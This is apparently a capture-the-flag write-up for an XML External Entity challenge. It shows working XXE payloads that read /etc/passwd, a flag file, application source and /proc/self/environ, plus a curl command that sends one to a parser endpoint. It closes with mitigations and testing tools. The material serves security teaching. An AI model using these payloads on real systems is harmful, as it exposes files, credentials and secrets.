XXE Exposed

XML External Entity (XXE) attacks exploit vulnerable XML parsers that process external entity references. This challenge features a corporate XML document parser with a critical XXE vulnerability that allows file disclosure attacks through external entity injection.

1. Access the challenge: Navigate to <target-ip>:80 to view the challenge presentation page
2. Identify the XML parser service: The vulnerable XML document parser runs on <target-ip>:8080
3. Test basic functionality: Use the provided sample XML on the interface to understand how the parser works
4. Analyze response structure: Observe that the parser processes XML and returns parsed content with detailed output

The vulnerable parser implementation uses:

• xmllint with --noent flag: This command resolves external entities, making it vulnerable to XXE
• Flask endpoint /parse: Accepts POST requests with XML data
• No input sanitization: The parser processes XML without filtering dangerous constructs
• File system access: The application has read permissions on the server filesystem

1. Create a basic XXE test payload: Start by testing external entity processing with a common system file
2. Test payload for /etc/passwd:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
    <title>XXE Test</title>
    <content>&xxe;</content>
</document>

3. Submit the test payload: Use the web interface at <target-ip>:8080 or send a POST request to /parse
4. Verify XXE functionality: If successful, you should see /etc/passwd contents in the parsed output, confirming the XXE vulnerability

Based on the challenge structure and common CTF patterns, the flag is located at /home/flag.txt. This is confirmed by:

• Challenge hint: The flag is in the home directory (/home)
• Application setup: The Flask app creates the flag file at /home/flag.txt during initialization
• File permissions: The application has read access to this location

1. Create the XXE payload to read the flag:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
  <!ENTITY flag SYSTEM "file:///home/flag.txt">
]>
<document>
    <title>Flag Retrieval</title>
    <content>&flag;</content>
</document>

2. Execution methods:
• Web Interface: Paste the payload into the XML input field and click "Parse Document"
• Command Line: Use curl to send the payload directly:

curl -X POST -H "Content-Type: application/xml" \
  -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE document [<!ENTITY flag SYSTEM "file:///home/flag.txt">]><document><title>Flag Retrieval</title><content>&flag;</content></document>' \
  <target-ip>:8080/parse

1. Successful XXE execution: The vulnerable xmllint parser resolves the external entity and reads the flag file
2. Parser output analysis: The flag content appears in the parsed document output
3. Flag retrieved:

For further exploration and learning, you can test additional XXE vectors:

1. System reconnaissance:

# Read application source code
<!ENTITY app SYSTEM "file:///app/app.py">

# Read system hosts file
<!ENTITY hosts SYSTEM "file:///etc/hosts">

# Read environment variables
<!ENTITY env SYSTEM "file:///proc/self/environ">

# Read process information
<!ENTITY cmdline SYSTEM "file:///proc/self/cmdline">

2. Parameter entities: For more complex attacks where direct entity references might be filtered
3. Out-of-band XXE: When direct response reading is not possible

• Root Cause: Use of xmllint with --noent flag which resolves external entities
• Attack Vector: SYSTEM entity references in DOCTYPE declarations
• Impact: Complete file system disclosure within application permissions
• Processing Flow: XML → temp file → xmllint --noent → resolved XML → content extraction
• No Validation: No filtering of dangerous XML constructs or entity references

• Data Disclosure: XXE can expose sensitive files, configuration data, and credentials
• SSRF Attacks: External entities can be used to make requests to internal services
• Denial of Service: Billion laughs attacks and recursive entity expansion
• Remote Code Execution: In some configurations, XXE can lead to RCE
• Business Impact: Potential for complete data breach and system compromise

• Disable External Entities: Configure XML parsers to reject external entity processing
• Input Validation: Implement strict XML input validation and sanitization
• Secure Parser Configuration: Use XML libraries with secure defaults
• Principle of Least Privilege: Run applications with minimal file system access
• Web Application Firewall: Deploy WAF rules to detect XXE attack patterns
• Regular Security Testing: Include XXE testing in security assessments

• Burp Suite: Professional tool for intercepting and modifying XML requests
• OWASP ZAP: Free security testing proxy with XXE detection capabilities
• curl/wget: Command-line tools for testing XXE payloads
• XXE Payloads: Curated collections of XXE test vectors and payloads
• Automated Scanners: Tools that automatically detect XXE vulnerabilities